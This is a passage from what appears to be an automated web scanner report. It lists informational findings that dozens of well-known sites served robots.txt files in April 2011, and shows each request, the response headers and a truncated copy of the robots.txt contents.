HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Mar 2011 01:17:23 GMT
ETag: "15c"
Cteonnt-Length: 348
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:25:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:25:45 GMT
Content-Length: 348
Connection: close

User-agent: *
Disallow: /html/ad.html
Disallow: /html/thirdPartyPixel.html
Disallow: /html/3rdParty/
Disallow: /components/ad/display_ad.htm
Disallow: /track/diapers.htm
Disallow: /ratingForm.htm
Disa
...[SNIP]...
24.84. http://www.babylon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babylon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babylon.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.27
Date: Sat, 02 Apr 2011 13:35:43 GMT
Content-Type: text/plain
Content-Length: 128
Last-Modified: Mon, 12 Oct 2009 12:45:40 GMT
Connection: close
Accept-Ranges: bytes

# Robots.TXT for http://www.babylon.com

User-agent: *
Disallow: /forms
Disallow: /style
Disallow: /templates

Disallow: /*.BGL$
24.85. http://www.backpage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backpage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.backpage.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "28-477946db"
Accept-Ranges: bytes
Content-Type: text/plain
Age: 50199
Date: Sat, 02 Apr 2011 13:32:54 GMT
Last-Modified: Mon, 31 Dec 2007 19:45:31 GMT
Content-Length: 40
Connection: close

User-agent: *
Disallow:
Crawl-Delay: 30
24.86. http://www.backtype.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backtype.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.backtype.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:36:52 GMT
Content-Type: text/plain
Content-Length: 1370
Last-Modified: Mon, 28 Feb 2011 09:20:29 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

User-agent: Googlebot
Disallow: /*?
Disallow: /*.php$
Disallow: /ajax/
Disallow: /anonymous/
Disallow: /connect/
Disallow: /domain/
Disallow: /forgot
Disallow: /home
Disallow: /home/
Disallow: /me
Dis
...[SNIP]...
24.87. http://www.baidu.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.baidu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.baidu.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:12 GMT
Server: Apache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Set-Cookie: BAIDUID=EE3BB7958D961AB11328218E7CA0AE12:FG=1; expires=Sun, 01-Apr-12 13:56:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Last-Modified: Wed, 05 Jan 2011 13:25:33 GMT
ETag: "75-4991951d52d40"
Accept-Ranges: bytes
Content-Length: 117
Vary: Accept-Encoding,User-Agent
Connection: Close
Content-Type: text/plain

User-agent: Baiduspider
Disallow: /baidu

User-agent: *
Disallow: /shifen/
Disallow: /homepage/
Disallow: /cpro
24.88. http://www.bankofamerica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:42:49 GMT
Content-length: 1298
Content-type: text/plain
Last-modified: Sun, 20 Mar 2011 05:57:57 GMT
Accept-ranges: bytes
Connection: close
Set-Cookie: BIGipServerngen-www.80=3058087595.20480.0000; path=/

User-agent: * # applies to all robots
Disallow: /global     # disallow indexing of restricted areas
Disallow: /cfdocs
Disallow: /thirdparty
Disallow: /directbenefits
Disallow: /groupbanking

...[SNIP]...
24.89. http://www.bankrate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bankrate.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Jan 2011 16:32:12 GMT
ETag: "8112114476b2cb1:781c"
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb01
X-Powered-By: ASP.NET
Cache-Control: max-age=129600
Date: Sat, 02 Apr 2011 13:37:13 GMT
Content-Length: 7620
Connection: close

User-agent: gsa-crawler # directed to internal search agent
Disallow: /0cec13ff-2603-4b90-95a1-7fac46411985/
Disallow: /acc_random*
Disallow: /brm_c/
Disallow: /brm/_private/
Disallow: /brm/_Sc
...[SNIP]...
24.90. http://www.barnesandnoble.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barnesandnoble.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.barnesandnoble.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
P3P: CP="CAO DSP COR ADM DEV TAI PSA IVDo CONo HIS TELo DEL SAMo UNRo LEG PRE"
X-Powered-By: ASP.NET
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Wed, 29 Sep 2010 20:58:07 GMT
ETag: "1c34241960cb1:195c"
Content-Length: 137
Cache-Control: max-age=40079
Expires: Sun, 03 Apr 2011 00:33:13 GMT
Date: Sat, 02 Apr 2011 13:25:14 GMT
Connection: close


# www

User-agent: *
Disallow: /reviews/reviews.asp

User-agent: Yahoo! Slurp
Crawl-delay: 1
Disallow: /reviews/reviews.asp

24.91. http://www.bathandbodyworks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bathandbodyworks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bathandbodyworks.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:44 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Mar 2011 09:09:19 GMT
ETag: "a7cd60-151-49d7c44958dc0"
Accept-Ranges: bytes
Content-Length: 337
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 14:05:44 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /coreg/
Disallow: /gcoreg/
Disallow: /cart/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /checkout/
Disallow: /images/
Disallow: /emailFriend/
Disal
...[SNIP]...
24.92. http://www.bbc.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bbc.co.uk

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain
Date: Sat, 02 Apr 2011 12:43:25 GMT
Keep-Alive: timeout=4, max=199
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 16 Feb 2011 16:13:09 GMT
Content-Length: 7594

User-agent: Googlebot
Disallow: /iplayer/episode/*?from=r*
Disallow: /iplayer/cy/episode/*?from=r*
Disallow: /iplayer/gd/episode/*?from=r*
Sitemap: http://www.bbc.co.uk/news_sitemap.xml
Sitemap: http:
...[SNIP]...
24.93. http://www.bbt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bbt.com

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fabaeebafa; path=/
accept-ranges: bytes
connection: close
content-length: 803
content-type: text/plain
date: Sat, 02 Apr 2011 13:41:55 GMT
etag: "80b65714957eca1:17bf"
last-modified: Wed, 16 Dec 2009 21:16:49 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; Path=/

# The following files were requested to be excluded from search engines including our internal engine
# BB&T Site Server

User-agent: *
Disallow: /adminasp/
Disallow: /about/cra/goodcompanynewsle
...[SNIP]...
24.94. http://www.bearshare.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bearshare.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bearshare.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 01 Jul 2010 11:55:22 GMT
ETag: "5c-25255e80"
Accept-Ranges: bytes
Content-Length: 92
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:32:37 GMT
Connection: close

User-Agent: *
Disallow: /helpfiles/
Disallow: /home/
Disallow: /all-music/private/
Allow: /
24.95. http://www.bedbathandbeyond.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bedbathandbeyond.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bedbathandbeyond.com

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 17 Nov 2010 11:15:46 GMT
Server: Microsoft-IIS/6.0
X-Who-O: AS7
X-Powered-By: ASP.NET
Content-Type: text/plain
ETag: "pv3c3e4f9b26166751f3a5e27acc629b3e"
Expires: Sat, 02 Apr 2011 21:22:08 GMT
Cache-Control: public, s-maxage=604800, max-age=28800
X-PvInfo: [S11101.C5517.A65477.RA0.G1011C.UB7BEBFDD].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
X-Who: 2004
Connection: close
Date: Sat, 02 Apr 2011 13:36:11 GMT
Age: 843
Content-Length: 818
X-Who-L: LB2001
Set-Cookie: BBBDC=WDC1;path=/;

User-agent: *
Disallow: /showCart.asp
Disallow: /cgi-bin
Disallow: /regGiftRegistry.asp
Disallow: /regProduct.asp
Disallow: /prodNotAvailable.asp
Disallow: /prodNotAvailableCirc.asp
Disallow: /
...[SNIP]...
24.96. http://www.beezid.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beezid.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beezid.com

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 09 Feb 2010 18:12:00 GMT
ETag: "b0a798-10c-47f2edaa03c00"
Content-Type: text/plain; charset=UTF-8
Content-Length: 268
Server: Apache
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 14:02:48 GMT
Connection: close

User-agent:    *
Disallow: /updater.php
Disallow: /auctions/updater/
Disallow: /js/
Disallow: /cjs/
Disallow: /unAuto/
Disallow: /auctions/pin/
Disallow: /reminders/setReminder/
Disallow: /auctions/revea
...[SNIP]...
24.97. http://www.bellaonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bellaonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bellaonline.com

Response

HTTP/1.1 200 OK
Content-Length: 156
Content-Type: text/plain
Last-Modified: Fri, 21 Mar 2008 03:13:10 GMT
Accept-Ranges: bytes
ETag: "b062227e18bc81:86c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:57:48 GMT
Connection: close

User-agent: Dllbot
Disallow: /

User-agent: *
Disallow: /members
Disallow: /admin
Disallow: /content
Disallow: /ebooks/files
Disallow: /review/files
24.98. http://www.bellsouth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bellsouth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bellsouth.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:31:40 GMT
Content-length: 58
Content-type: text/plain
Last-modified: Wed, 22 Aug 2007 13:25:45 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /stats/
Disallow: /consumer/atlas/
24.99. http://www.bestwestern.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bestwestern.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bestwestern.com

Response

HTTP/1.0 200 OK
Content-Length: 54
Content-Type: text/plain
Last-Modified: Tue, 10 Mar 2009 21:21:33 GMT
Accept-Ranges: bytes
ETag: "dda8d82fc6a1c91:2994"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:56:43 GMT
Connection: close

User-agent: *
Disallow: /bwmail/
Disallow: /eandt/
24.100. http://www.bettycrocker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bettycrocker.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bettycrocker.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Type: text/plain
Last-Modified: Wed, 09 Mar 2011 11:40:51 GMT
Accept-Ranges: bytes
ETag: "3c253cd74edecb1:0"
Server: Microsoft-IIS/7.0
Content-Length: 300
Date: Sat, 02 Apr 2011 13:45:49 GMT
Connection: close

...User-agent: *
Disallow: /Register
Disallow: /login
Disallow: /search
Disallow: /*.axd
Disallow: /CMSTemplates
Disallow: /cmstemplates
Disallow: /Controls
Disallow: /controls
Disallow: /Pri
...[SNIP]...
24.101. http://www.beyond.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beyond.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beyond.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 01 Mar 2011 16:09:11 GMT
Accept-Ranges: bytes
ETag: "8aa2c402bd8cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:02:59 GMT
Connection: close
Content-Length: 364

User-Agent: *

Disallow: /CC/
Disallow: /Common/
Disallow: /EMP/Action/
Disallow: /EMP/Form/
Disallow: /JS/Form/
Disallow: /cc/
Disallow: /common/
Disallow: /emp/action/
Disallow: /emp/form/
...[SNIP]...
24.102. http://www.bhphotovideo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bhphotovideo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bhphotovideo.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 02 Apr 2011 03:03:16 GMT
ETag: "491-4d9691f4"
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 13:58:08 GMT
Content-Length: 1169
Connection: close

User-agent: *
Disallow: /c/search*
Disallow: /search*
Disallow: /federal
Disallow: */edu
Disallow: /c/find/
Disallow: /impact/
Disallow: /find/organizational-sales.jsp*
Disallow: /find/gsa.jsp
Disallo
...[SNIP]...
24.103. http://www.biblegateway.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.biblegateway.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:34:50 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Thu, 31 Mar 2011 20:34:46 GMT
ETag: "c0b37-8f-3957a580"
Accept-Ranges: bytes
Content-Length: 143

User-agent: *
Disallow: /cgi-bin/guestbook
Disallow: /feedback
Disallow: /share
Sitemap: http://www.biblegateway.com/site-map/map-index.xml
24.104. http://www.bigfishgames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigfishgames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigfishgames.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:17 GMT
Server: Apache
Last-Modified: Wed, 01 Dec 2010 23:56:06 GMT
Accept-Ranges: bytes
Content-Length: 458
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=9921
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_tjuftqfd_op_bgtsd=ffffffff094e0d0a45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 05:42:06 GMT;path=/;httponly

User-agent: *
Disallow: /_include/
Disallow: /affiliate/
Disallow: /cgi-bin/
Disallow: /css/
Disallow: /javascript/
Disallow: /php/
Disallow: /toolbar/barserver.php
Disallow: /toolbar/options.
...[SNIP]...
24.105. http://www.bigpoint.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigpoint.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigpoint.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:54:03 GMT
X-XLB-Cache: hit
Content-Type: text/plain; charset=UTF-8
Content-Length: 55
Expires: Sat, 02 Apr 2011 14:01:32 GMT
Last-Modified: Sat, 02 Apr 2011 13:41:32 GMT
Connection: Close

# www.bigpoint.com robots.txt

User-agent: *
Disallow:
24.106. http://www.bizjournals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizjournals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizjournals.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache
ServerID: 5
Vary: Accept-Encoding
Content-Length: 3065
Connection: close
Content-Type: text/plain

User-agent: YahooSeeker/CafeKelsa
Disallow: /

User-agent: dotbot
Disallow: /

User-agent: Yandex
Disallow: /

User-agent: Mail.Ru/1.0
Disallow: /

User-agent: blp_bbot
Disallow: /

User-agent: Slurp

...[SNIP]...
24.107. http://www.bizrate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizrate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizrate.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: trafficSourceDebugParam=""; Domain=.bizrate.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NON DSP ADM DEV PSD TAI OUR IND STP PRE NAV UNI"
Set-Cookie: yes_email_invite=invite3; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:44:12 GMT; Path=/
Pragma:
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control:
Set-Cookie: sessionid=620512693270107052; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:44:12 GMT; Path=/
Set-Cookie: br=13017482526116310739302050102029256; Domain=.bizrate.com; Expires=Tue, 30-Mar-2021 12:44:12 GMT; Path=/
Set-Cookie: _data=_time%3A%3Astart_time%3D1301748252%3Btimestamp%3D1301748252%7Ctracker%3A%3Ahtcnt%3D1%3Brf%3Dwlk; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:44:12 GMT; Path=/
Set-Cookie: p13n_id=0001afa1ee8c3d9c47d1b3c2fcfb54dd823e; Domain=.bizrate.com; Expires=Tue, 30-Mar-2021 12:44:12 GMT; Path=/
Set-Cookie: rng=8685133; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:44:12 GMT; Path=/
Set-Cookie: sosurvey_response=none%3A%3Afalse%3A%3Afalse%3A%3Ahttp%3A%2F%2Fevalus.bizrate.com%2Fwix%2Fp1648730.aspx%3Fbr%3D13017482526116310739302050102029256%26session_id%3D620512693270107052%26rf_code%3Dwlk%26brand%3DBR%26country_code%3DUS%26pageToken%3D2D; Domain=.bizrate.com; Expires=Mon, 02-May-2011 12:44:12 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"2971-1297963980000"
Last-Modified: Thu, 17 Feb 2011 17:33:00 GMT
Content-Type: text/plain;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2971
Date: Sat, 02 Apr 2011 12:44:12 GMT
Connection: close

User-Agent: *
Disallow: /rd
Disallow: /rd2
Disallow: /mybizrate/
Disallow: /color_bumper.xpml
Disallow: /RetailStores
Disallow: /ProductReserve

User-Agent: Googlebot
Disallow: /rd
Disallow: /rd2
Disa
...[SNIP]...
24.108. http://www.blackberry.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blackberry.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:46 GMT
Server: Apache
Last-Modified: Tue, 08 Feb 2011 16:22:39 GMT
ETag: "11e82ea-1ca-49bc7c1cbd1c0"
Accept-Ranges: bytes
Content-Length: 458
Connection: close
Content-Type: text/plain

#Robots.txt for blackberry.com

#blackberry.com
User-agent: *
Disallow: /sporders/
Disallow: /spsales/
Disallow: /test/
Disallow: /partnersupport/
Disallow: /imsupport/
Disallow: /emailers/ownerlounge
...[SNIP]...
24.109. http://www.blackboard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackboard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blackboard.com

Response

HTTP/1.1 200 OK
Content-Length: 129
Content-Type: text/plain
Last-Modified: Tue, 11 Jan 2011 18:07:08 GMT
Accept-Ranges: bytes
ETag: "58b7825cbab1cb1:e82"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:04 GMT
Connection: close

User-agent: *

Disallow: /CMSDesk

Disallow: /CMSSiteManager
Disallow: /Collateral
Disallow: /Archive
Disallow: /Newsletters
24.110. http://www.blackplanet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackplanet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blackplanet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.4
Page-Name: /robots.txt
Set-Cookie: user_guid=d41d8cd98f00b204e9800998ecf8427e.4d972b719b6da5.28857868; path=/
Cache-Control: no-cache, no-store, private
Content-Length: 1450
Keep-Alive: timeout=120, max=496
Connection: Keep-Alive
Content-Type: text/plain; charset=utf-8

# "Any empty [Disallow] value, indicates that all URLs can be retrieved.
# At least one Disallow field needs to be present in a record."

User-agent: Fasterfox
Disallow: /

User-Agent: OmniExplorer_Bo
...[SNIP]...
24.111. http://www.blastro.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blastro.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blastro.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:25 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Tue, 25 Nov 2008 17:47:45 GMT
ETag: "b6897-510-45c871be25240"
Accept-Ranges: bytes
Content-Length: 1296
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#For Google Adsense and Adwords Quality
User-agent: Mediapartners-Google
Disallow: /email/*
Disallow: /ms_asx/*
Disallow: /rmsmail/*
Disallow: /rate.php*
Disallow: /login.php*
Disallow: /titleb
...[SNIP]...
24.112. http://www.blockbuster.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blockbuster.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blockbuster.com

Response

HTTP/1.0 200 OK
Content-Length: 85
Content-Type: text/plain; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
X-N: S
Cache-Control: max-age=86400
Date: Sat, 02 Apr 2011 13:34:58 GMT
Connection: close

User-agent: *
Disallow: /queuemgmt/
Disallow: /aff/*
Disallow: /stores/storelocator/
24.113. http://www.blogtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blogtv.com

Response

HTTP/1.1 200 OK
Content-Length: 46
Content-Type: text/plain
Last-Modified: Wed, 13 Jun 2007 15:06:17 GMT
Accept-Ranges: bytes
ETag: "f9fd8c64ccadc71:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:00:23 GMT
Connection: close

# robots.txt

User-agent: *
Disallow:

24.114. http://www.bloomberg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bloomberg.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/plain
Last-Modified: Tue, 22 Jun 2010 21:49:45 GMT
ETag: W/"d7-4c212ff9"
Cache-Control: max-age=900
Expires: Sat, 02 Apr 2011 13:38:23 GMT
Date: Sat, 02 Apr 2011 13:23:23 GMT
Content-Length: 215
Connection: close

User-agent: *
User-agent: Mediapartners-Google*
Disallow:
Sitemap: http://www.bloomberg.com/sitemap_index.xml
Sitemap: http://www.bloomberg.com/sitemap_news.xml
Sitemap: http://www.bloomberg.com/sit
...[SNIP]...
24.115. http://www.bls.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bls.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bls.gov

Response

HTTP/1.1 200 OK
Content-Length: 452
Content-Type: text/plain
Last-Modified: Wed, 03 Dec 2008 21:10:56 GMT
Accept-Ranges: bytes
ETag: "0b0caa18b55c91:fc9"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR NID CURaADMa OUR STP"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:51 GMT
Connection: close

User-agent: archive.org_bot
Disallow:/include
Disallow:/scripts
Disallow:/oep
Disallow:/crs
Disallow:/_private
Disallow:/iisadmin
Disallow:/srchadm
Disallow:/fax
Disallow:/idcf
Disallow:/*pr
...[SNIP]...
24.116. http://www.bluemountain.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluemountain.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluemountain.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:38 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 13:30:55 GMT
ETag: "2720bc6-8fc-103301c0"
Accept-Ranges: bytes
Content-Length: 2300
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /addaphoto/
Disallow: /cards/
Disallow: /cares/
Disallow: /channel/
Disallow: /click-or-treat/
Disallow: /contest/chatboard/
Disallow: /desktop/
Disallow: /ecards/addap
...[SNIP]...
24.117. http://www.blurtit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blurtit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:13 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 01 Apr 2011 14:07:31 GMT
ETag: "2100033-6b8-49fdbee450ec0"
Accept-Ranges: bytes
Content-Length: 1720
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /search/
Disallow: /ads/
Disallow: /me/
Disallow: /test/
Disallow: /ads/
Disallow: /answer.php
Disallow: /rateit.php
Disallow: /lander.php
Disallow: /listings.
...[SNIP]...
24.118. http://www.bnet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bnet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bnet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:30 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 19:28:50 GMT
Accept-Ranges: bytes
Content-Length: 2091
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Type: text/plain

User-agent: Googlebot-Mobile
Disallow: /
User-agent: YahooSeeker/M1A1-R2D2
Disallow: /
User-agent: MSNBOT_Mobile
